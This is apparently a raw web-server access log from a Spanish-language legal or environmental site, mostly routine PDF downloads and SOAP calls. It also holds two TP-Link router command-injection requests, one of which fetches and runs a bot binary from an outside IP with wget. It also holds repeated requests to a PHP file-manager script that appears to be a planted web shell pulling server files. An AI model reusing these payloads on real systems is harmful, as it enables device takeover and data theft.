0ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18b1xm4dwGK20Q9FFjCuaFkfTzeF2O9Iv0OTcCE8m61Y7oNq59wehjUN4st25BXFtiPuvunUoiGJGGV42OZiWWsXupEXoYYF1ZSX/AnwMj0xUV3ObVBCjXLHkKw+TFZEr7e2iD+74C+CJwQ4lr20da/P8FOiu3SBCE=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19eiQJ4GtWQ1iwlUuAWF8llVCmvWn7xsPngrZsat8XJxSVthqYmJR7oajG+gE2KN48hKtDf7ZTZTckUBpQuSSh8pc+sdTvnOuHwuT8PoTy8rYlM1qqFublhN3O7je2nlNl7PnfvkwpaHRJthzpUpq6Ryhr7hv2+B7k=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/DegwNrGeOYToZhsbaUditWib1AIycXeDQnGZt+jCBTYQEGhcrux/KfplmcBXDZZcxLEV60CM1lP94C0lmanaokEl9BQ3ukFndvt7ANWv4NLOQWIemzBY7TjuYYotLdmgLk2kOY6qQuW9cblqDpiF1QM8nAFAwj/g=&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19nAOLkbOXK12GejLQuAqj0phB8fI7/KCGs8g81BjiCrYBA1bsxxM/pD8M2pyeD9hzUfjysOUtlY71KJvvSjuRF0C3SMORAQzRn1p8D2Mx7Jsww8c/+ze0BhLKcf4rM+qwHgyc1Hf5dt99n0R/jUzNfKvDztPLg2ETdzWLK2FLebfohiPKJBRnpy+xksTuhxF003b+2w0w1eQ==&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18a+6rONb+G46VoVkYFQX+DWbnhP3RCUU/1qux42K1cct4t6eYG5x1c+EaQSaO+BUvRuRHtQJt/fZJsNicRpykySxwpkHSbehy64/7slUyfRnMd5LWdDfKZRDfvtkzSLbSg7tokKjoCQ2oihj+84R0YbF+ycrzMp8xEWmFhml+OP+re0L943e3M2/FTbjhIOuwwF5nAOd6XJo3l8Wn7uMuVHO2xl2XpKxTYq2jGAo3X1bhCrA1QpsSPtVhELJKf7l3txvx7Z9Fd7c9xWdZQuVvpyttdeZTlMl7t4LpuN4vgKNdFXe6mXBO/fTzETobjkpbV33givRyn4o01rpHp3+GdlQO9Dm3wnHakHBmomPon2MLYhuw/PpbnxObL5tECrqX8zTLawMpWdCzardCsUlyynMezhEycHAZ4C3iV2snZ6Ol+G0pmEhycp/oftu3oN0hruX/JgveD9jnIWI3TSDMF8wmBkBbKUC+o39Vl7HHxRNuUJabGgKlX&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
186.102.2.168 - - [22/Jun/2024:03:47:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18/EpagwMM+KKk4ndF8m2OoyPoX1674mKuw1tXg5U/bxSboZLnXgkDyftnaZzeh4JbMiyRFJFz9DIMc13nmAFTj1btZeV9vyiKjN9x8dcVYw7lI5rs0SKrfFza0EzKKG0iaWe4gb3UKyUc/o2PfOoWcvqUU6Jp9p7KM/2rDlbIY0B/esLOM3v38+hb4lC6NrVf630floj3m4ujlXlmEiTcEUOuWBw1zQhXIYHFp4NWmH02cFRtYUIbgtXxzpekdq6vzycO4RA4Moeqm8Nx2BIQQp5JhZ/XoZk7h22m40UjTJKMu/2rMWT73Gq06ItSKxGYC7OLCBdPtjKiGoSz8ecc1Un+70+C9nol4GIOBJvnZ7SvWk02JtzzqIw9StYHXDiKdtzv3EHZJocmjI1HzEif7jTO++N5gXKrtL0LXLh14p4oqJx38tazDyGb1EwJvRFESEmwgnVniNg==&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
23.22.35.162 - - [22/Jun/2024:03:47:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/5312.pdf HTTP/1.1" 200 394892
201.245.192.253 - - [22/Jun/2024:03:47:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:03:47:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3849.pdf HTTP/1.1" 200 364957
52.70.240.171 - - [22/Jun/2024:03:47:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/5311.pdf HTTP/1.1" 200 467168
3.224.220.101 - - [22/Jun/2024:03:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/5310.pdf HTTP/1.1" 200 590789
23.22.35.162 - - [22/Jun/2024:03:47:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5309.pdf HTTP/1.1" 200 752669
52.70.240.171 - - [22/Jun/2024:03:47:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/5308.pdf HTTP/1.1" 200 398226
52.70.240.171 - - [22/Jun/2024:03:47:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5307.pdf HTTP/1.1" 200 752757
47.128.114.8 - - [22/Jun/2024:03:47:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora2%5Cimages&f=calculadora-solar1.jpg&ft=download HTTP/1.1" 200 2801304
3.224.220.101 - - [22/Jun/2024:03:47:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/5306.pdf HTTP/1.1" 200 390444
23.22.35.162 - - [22/Jun/2024:03:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/3848.pdf HTTP/1.1" 200 423056
52.70.240.171 - - [22/Jun/2024:03:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/5304.pdf HTTP/1.1" 200 902100
3.224.220.101 - - [22/Jun/2024:03:47:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/3847.pdf HTTP/1.1" 200 473410
3.224.220.101 - - [22/Jun/2024:03:48:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/5303.pdf HTTP/1.1" 200 1760576
23.22.35.162 - - [22/Jun/2024:03:48:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3846.pdf HTTP/1.1" 200 400298
52.70.240.171 - - [22/Jun/2024:03:48:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/5302.pdf HTTP/1.1" 200 382760
3.224.220.101 - - [22/Jun/2024:03:48:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/3845.pdf HTTP/1.1" 200 395527
23.22.35.162 - - [22/Jun/2024:03:48:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/5297.pdf HTTP/1.1" 200 344089
201.245.192.253 - - [22/Jun/2024:03:48:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.18.76 - - [22/Jun/2024:03:48:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0482.pdf&ft=download&white=1 HTTP/1.1" 200 20135
52.70.240.171 - - [22/Jun/2024:03:48:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3844.pdf HTTP/1.1" 200 412918
23.22.35.162 - - [22/Jun/2024:03:48:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/5293.pdf HTTP/1.1" 200 401036
3.224.220.101 - - [22/Jun/2024:03:48:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3843.pdf HTTP/1.1" 200 435592
66.249.66.19 - - [22/Jun/2024:03:48:34 -0500] "GET /resoluciones/RESOLUCIONES%202009/1335.pdf HTTP/1.1" 404 1018
23.22.35.162 - - [22/Jun/2024:03:48:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5292.pdf HTTP/1.1" 200 390051
52.70.240.171 - - [22/Jun/2024:03:48:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3842.pdf HTTP/1.1" 200 349772
52.70.240.171 - - [22/Jun/2024:03:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/5282.pdf HTTP/1.1" 200 416480
23.22.35.162 - - [22/Jun/2024:03:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3841.pdf HTTP/1.1" 200 348536
3.224.220.101 - - [22/Jun/2024:03:48:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/5279.pdf HTTP/1.1" 200 369106
23.22.35.162 - - [22/Jun/2024:03:48:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/3840.pdf HTTP/1.1" 200 350635
47.128.40.221 - - [22/Jun/2024:03:48:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024%5C&f=00377.pdf&ft=download&white=1 HTTP/1.1" 200 364198
3.224.220.101 - - [22/Jun/2024:03:48:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/5277.pdf HTTP/1.1" 200 1041197
52.70.240.171 - - [22/Jun/2024:03:49:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/3839.pdf HTTP/1.1" 200 360864
3.224.220.101 - - [22/Jun/2024:03:49:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/5276.pdf HTTP/1.1" 200 390897
3.224.220.101 - - [22/Jun/2024:03:49:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3838.pdf HTTP/1.1" 200 351826
40.77.167.41 - - [22/Jun/2024:03:49:15 -0500] "GET /condiciones-meteorologicas-y-reduccion-de-concentracion-de-contaminantes-permiten-levantar-alerta-por-calidad-del-aire-en-el-suroccidente-de-la-ciudad.html HTTP/1.1" 200 1316
23.22.35.162 - - [22/Jun/2024:03:49:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5275.pdf HTTP/1.1" 200 372159
52.70.240.171 - - [22/Jun/2024:03:49:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/3837.pdf HTTP/1.1" 200 347671
201.245.192.253 - - [22/Jun/2024:03:49:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:03:49:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/5274.pdf HTTP/1.1" 200 402722
216.245.221.92 - - [22/Jun/2024:03:49:25 -0500] "HEAD / HTTP/1.1" 200 -
23.22.35.162 - - [22/Jun/2024:03:49:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/3836.pdf HTTP/1.1" 200 349015
3.224.220.101 - - [22/Jun/2024:03:49:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/5272.pdf HTTP/1.1" 200 422702
47.128.121.24 - - [22/Jun/2024:03:49:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001789.tif&ft=download&white=1 HTTP/1.1" 200 168332
3.224.220.101 - - [22/Jun/2024:03:49:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/3835.pdf HTTP/1.1" 200 357567
201.245.192.253 - - [22/Jun/2024:03:49:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
23.22.35.162 - - [22/Jun/2024:03:49:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/5270.pdf HTTP/1.1" 200 395367
3.224.220.101 - - [22/Jun/2024:03:49:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5269.pdf HTTP/1.1" 200 380970
3.224.220.101 - - [22/Jun/2024:03:49:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/3834.pdf HTTP/1.1" 200 350072
23.22.35.162 - - [22/Jun/2024:03:49:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/5268.pdf HTTP/1.1" 200 383795
52.70.240.171 - - [22/Jun/2024:03:49:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/3833.pdf HTTP/1.1" 200 352811
3.224.220.101 - - [22/Jun/2024:03:49:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/5266.pdf HTTP/1.1" 200 318021
52.70.240.171 - - [22/Jun/2024:03:50:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3832.pdf HTTP/1.1" 200 371397
47.128.40.148 - - [22/Jun/2024:03:50:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=tbl_chart.lib.php&ft=download&white=1 HTTP/1.1" 200 10256
172.22.2.4 - - [22/Jun/2024:03:48:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [22/Jun/2024:03:50:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/5262.pdf HTTP/1.1" 200 400365
3.224.220.101 - - [22/Jun/2024:03:50:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3831.pdf HTTP/1.1" 200 359020
52.70.240.171 - - [22/Jun/2024:03:50:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5235.pdf HTTP/1.1" 200 933094
52.70.240.171 - - [22/Jun/2024:03:50:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/3830.pdf HTTP/1.1" 200 359859
201.245.192.253 - - [22/Jun/2024:03:50:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:03:50:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/5234.pdf HTTP/1.1" 200 403983
23.22.35.162 - - [22/Jun/2024:03:50:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/5233.pdf HTTP/1.1" 200 402593
23.22.35.162 - - [22/Jun/2024:03:50:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3829.pdf HTTP/1.1" 200 339353
3.224.220.101 - - [22/Jun/2024:03:50:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/5232.pdf HTTP/1.1" 200 435023
3.224.220.101 - - [22/Jun/2024:03:50:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3828.pdf HTTP/1.1" 200 368374
47.128.50.235 - - [22/Jun/2024:03:50:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=Thumbs.db&ft=download&white=1 HTTP/1.1" 200 215552
52.70.240.171 - - [22/Jun/2024:03:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5231.pdf HTTP/1.1" 200 512536
3.224.220.101 - - [22/Jun/2024:03:50:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3827.pdf HTTP/1.1" 200 344606
52.70.240.171 - - [22/Jun/2024:03:50:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/5230.pdf HTTP/1.1" 200 574222
3.224.220.101 - - [22/Jun/2024:03:50:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/3826.pdf HTTP/1.1" 200 356274
172.22.2.4 - - [22/Jun/2024:03:49:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
52.70.240.171 - - [22/Jun/2024:03:50:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/5228.pdf HTTP/1.1" 200 440862
3.224.220.101 - - [22/Jun/2024:03:51:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/3825.pdf HTTP/1.1" 200 358522
23.22.35.162 - - [22/Jun/2024:03:51:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/5227.pdf HTTP/1.1" 200 482232
52.70.240.171 - - [22/Jun/2024:03:51:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3824.pdf HTTP/1.1" 200 347467
23.22.35.162 - - [22/Jun/2024:03:51:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5192.pdf HTTP/1.1" 200 344794
47.128.23.228 - - [22/Jun/2024:03:51:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6047.pdf&ft=download&white=1 HTTP/1.1" 200 528039
52.70.240.171 - - [22/Jun/2024:03:51:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/3823.pdf HTTP/1.1" 200 365384
201.245.192.253 - - [22/Jun/2024:03:51:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:03:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/5167.pdf HTTP/1.1" 200 383835
52.70.240.171 - - [22/Jun/2024:03:51:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/3822.pdf HTTP/1.1" 200 360732
23.22.35.162 - - [22/Jun/2024:03:51:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/5166.pdf HTTP/1.1" 200 1149508
66.249.66.19 - - [22/Jun/2024:03:51:31 -0500] "GET /BLA/resoluciones/AUTOS%202008/1015.pdf HTTP/1.1" 200 366911
52.70.240.171 - - [22/Jun/2024:03:51:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/3821.pdf HTTP/1.1" 200 357633
3.224.220.101 - - [22/Jun/2024:03:51:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/5142.pdf HTTP/1.1" 200 1123102
3.224.220.101 - - [22/Jun/2024:03:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/3820.pdf HTTP/1.1" 200 405060
23.22.35.162 - - [22/Jun/2024:03:51:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/5137.pdf HTTP/1.1" 200 358531
47.128.121.8 - - [22/Jun/2024:03:51:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1887.pdf&ft=download&white=1 HTTP/1.1" 200 380583
52.70.240.171 - - [22/Jun/2024:03:51:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/3819.pdf HTTP/1.1" 200 412780
23.22.35.162 - - [22/Jun/2024:03:51:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/5136.pdf HTTP/1.1" 200 356826
52.70.240.171 - - [22/Jun/2024:03:51:59 -0500] "GET /BLA/resoluciones/AUTOS%202020/3818.pdf HTTP/1.1" 200 405142
3.224.220.101 - - [22/Jun/2024:03:52:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/5135.pdf HTTP/1.1" 200 357278
3.224.220.101 - - [22/Jun/2024:03:52:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/5133.pdf HTTP/1.1" 200 350467
52.70.240.171 - - [22/Jun/2024:03:52:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3817.pdf HTTP/1.1" 200 427081
23.22.35.162 - - [22/Jun/2024:03:52:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5132.pdf HTTP/1.1" 200 419033
23.22.35.162 - - [22/Jun/2024:03:52:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/3816.pdf HTTP/1.1" 200 393914
201.245.192.253 - - [22/Jun/2024:03:52:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:03:52:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/5131.pdf HTTP/1.1" 200 394165
47.128.40.146 - - [22/Jun/2024:03:52:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=chk_rel.php&ft=download&white=1 HTTP/1.1" 200 308
3.224.220.101 - - [22/Jun/2024:03:52:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/3815.pdf HTTP/1.1" 200 349874
3.224.220.101 - - [22/Jun/2024:03:52:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/5130.pdf HTTP/1.1" 200 355764
52.70.240.171 - - [22/Jun/2024:03:52:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/3814.pdf HTTP/1.1" 200 334338
52.70.240.171 - - [22/Jun/2024:03:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/5128.pdf HTTP/1.1" 200 358600
52.70.240.171 - - [22/Jun/2024:03:52:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/3813.pdf HTTP/1.1" 200 360230
3.224.220.101 - - [22/Jun/2024:03:52:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/5127.pdf HTTP/1.1" 200 418022
52.70.240.171 - - [22/Jun/2024:03:52:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/3810.pdf HTTP/1.1" 200 347677
3.224.220.101 - - [22/Jun/2024:03:52:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/5126.pdf HTTP/1.1" 200 357739
47.128.110.118 - - [22/Jun/2024:03:52:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5333.pdf&ft=download&white=1 HTTP/1.1" 200 356007
3.224.220.101 - - [22/Jun/2024:03:52:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/3809.pdf HTTP/1.1" 200 350539
23.22.35.162 - - [22/Jun/2024:03:53:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/5125.pdf HTTP/1.1" 200 360997
3.224.220.101 - - [22/Jun/2024:03:53:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3798.pdf HTTP/1.1" 200 350111
3.224.220.101 - - [22/Jun/2024:03:53:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/5124.pdf HTTP/1.1" 200 395812
23.22.35.162 - - [22/Jun/2024:03:53:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/3797.pdf HTTP/1.1" 200 348420
3.224.220.101 - - [22/Jun/2024:03:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/5123.pdf HTTP/1.1" 200 353212
201.245.192.253 - - [22/Jun/2024:03:53:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:03:53:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3796.pdf HTTP/1.1" 200 355244
23.22.35.162 - - [22/Jun/2024:03:53:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/5122.pdf HTTP/1.1" 200 389203
52.70.240.171 - - [22/Jun/2024:03:53:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3795.pdf HTTP/1.1" 200 351979
47.128.110.249 - - [22/Jun/2024:03:53:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=plugin_interface.lib.php&ft=download HTTP/1.1" 200 18079
23.22.35.162 - - [22/Jun/2024:03:53:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5121.pdf HTTP/1.1" 200 345992
23.22.35.162 - - [22/Jun/2024:03:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3794.pdf HTTP/1.1" 200 351524
23.22.35.162 - - [22/Jun/2024:03:53:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5120.pdf HTTP/1.1" 200 341629
52.70.240.171 - - [22/Jun/2024:03:53:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3793.pdf HTTP/1.1" 200 361940
23.22.35.162 - - [22/Jun/2024:03:53:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/5118.pdf HTTP/1.1" 200 357065
141.98.83.197 - - [22/Jun/2024:03:53:54 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [22/Jun/2024:03:53:55 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
52.70.240.171 - - [22/Jun/2024:03:53:55 -0500] "GET /BLA/resoluciones/AUTOS%202020/3789.pdf HTTP/1.1" 200 365722
23.22.35.162 - - [22/Jun/2024:03:53:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/5117.pdf HTTP/1.1" 200 366273
52.70.240.171 - - [22/Jun/2024:03:54:03 -0500] "GET /BLA/resoluciones/AUTOS%202020/3783.pdf HTTP/1.1" 200 406393
205.210.31.242 - - [22/Jun/2024:03:54:05 -0500] "\x16\x03\x01" 400 226
47.128.110.221 - - [22/Jun/2024:03:54:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=widgets.php&ft=download&white=1 HTTP/1.1" 200 53599
205.210.31.242 - - [22/Jun/2024:03:54:05 -0500] "\x16\x03\x01" 400 226
3.224.220.101 - - [22/Jun/2024:03:54:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/3777.pdf HTTP/1.1" 200 416242
3.224.220.101 - - [22/Jun/2024:03:54:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/3760.pdf HTTP/1.1" 200 1237866
52.70.240.171 - - [22/Jun/2024:03:54:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/3756.pdf HTTP/1.1" 200 414888
52.70.240.171 - - [22/Jun/2024:03:54:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/5116.pdf HTTP/1.1" 200 357023
201.245.192.253 - - [22/Jun/2024:03:54:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.224.220.101 - - [22/Jun/2024:03:54:23 -0500] "GET /BLA/resoluciones/AUTOS%202020/3751.pdf HTTP/1.1" 200 349125
216.245.221.92 - - [22/Jun/2024:03:54:25 -0500] "HEAD / HTTP/1.1" 200 -
52.70.240.171 - - [22/Jun/2024:03:54:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/5115.pdf HTTP/1.1" 200 386299
3.224.220.101 - - [22/Jun/2024:03:54:31 -0500] "GET /BLA/resoluciones/AUTOS%202020/3750.pdf HTTP/1.1" 200 360348
3.224.220.101 - - [22/Jun/2024:03:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5114.pdf HTTP/1.1" 200 411942
201.245.192.253 - - [22/Jun/2024:03:54:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.70.240.171 - - [22/Jun/2024:03:54:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/3749.pdf HTTP/1.1" 200 351168
186.102.2.168 - - [22/Jun/2024:03:54:41 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+4GEhWeqXiDOyGorXt5Dh7jeWiVQEKy/IXnGsb4otEDlHiVX6bM9iNRZAy12fHsfr1ClqHPsSIQWbdu7+U9wCPbTPYPFd/jtEyOG55AaM4Pzoq8Ma9iiGXNA9OjV2ad6CN1TEtqTOCCF1yIH/AkSpGqI2YJRdIxbCUD9KbsFjFiGERmJWSPjzbN+TM7aU2rafSP1corjP5Rb/X349RuLnu00zwdf9gwHWseYpkcgwsfr1g5bjifPkH4SpFWC3F8ihKGb080nBp3g==&u=U2FsdGVkX1/KF0NNXD1p4G50DzsCTMZXg6+F6XvHJ9k=&y=U2FsdGVkX1/sG00ZEYhbPmzJNZkaHzvJOsdDZX3t1dqvoEpNFizccOsuNR5giyMI HTTP/1.1" 200 26
